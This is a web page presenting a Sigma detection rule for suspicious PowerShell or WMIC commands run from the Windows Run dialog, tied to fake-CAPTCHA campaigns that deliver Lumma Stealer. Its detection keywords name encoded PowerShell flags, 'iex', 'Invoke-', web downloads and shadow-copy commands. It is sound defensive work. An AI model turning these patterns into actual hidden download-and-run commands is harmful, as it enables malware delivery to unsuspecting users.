Potentially Suspicious Command Executed Via Run Dialog Box - Registry
Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
Sigma rule (View on GitHub)
1title: Potentially Suspicious Command Executed Via Run Dialog Box - Registry
2id: a7df0e9e-91a5-459a-a003-4cde67c2ff5d
3related:
4 - id: f9d091f6-f1c7-4873-a24f-050b4a02b4dd
5 type: derived
6status: test
7description: |
8 Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key.
9 This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
10references:
11 - https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf
12 - https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71
13 - https://www.forensafe.com/blogs/runmrukey.html
14 - https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/
15author: Ahmed Farouk, Nasreddine Bencherchali
16date: 2024-11-01
17tags:
18 - attack.execution
19 - attack.t1059.001
20logsource:
21 product: windows
22 category: registry_set
23detection:
24 selection_key:
25 TargetObject|contains: '\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
26 selection_powershell_command:
27 Details|contains:
28 - 'powershell'
29 - 'pwsh'
30 selection_powershell_susp_keywords:
31 Details|contains:
32 - ' -e '
33 - ' -ec '
34 - ' -en '
35 - ' -enc '
36 - ' -enco'
37 - 'ftp'
38 - 'Hidden'
39 - 'http'
40 - 'iex'
41 - 'Invoke-'
42 selection_wmic_command:
43 Details|contains: 'wmic'
44 selection_wmic_susp_keywords:
45 Details|contains:
46 - 'shadowcopy'
47 - 'process call create'
48 condition: selection_key and (all of selection_powershell_* or all of selection_wmic_*)
49falsepositives:
50 - Unknown
51level: high
References
Related rules
- Renamed Powershell Under Powershell Channel
- Suspicious Non PowerShell WSMAN COM Provider
- Alternate PowerShell Hosts Pipe
- Lace Tempest PowerShell Evidence Eraser
- Lace Tempest PowerShell Launcher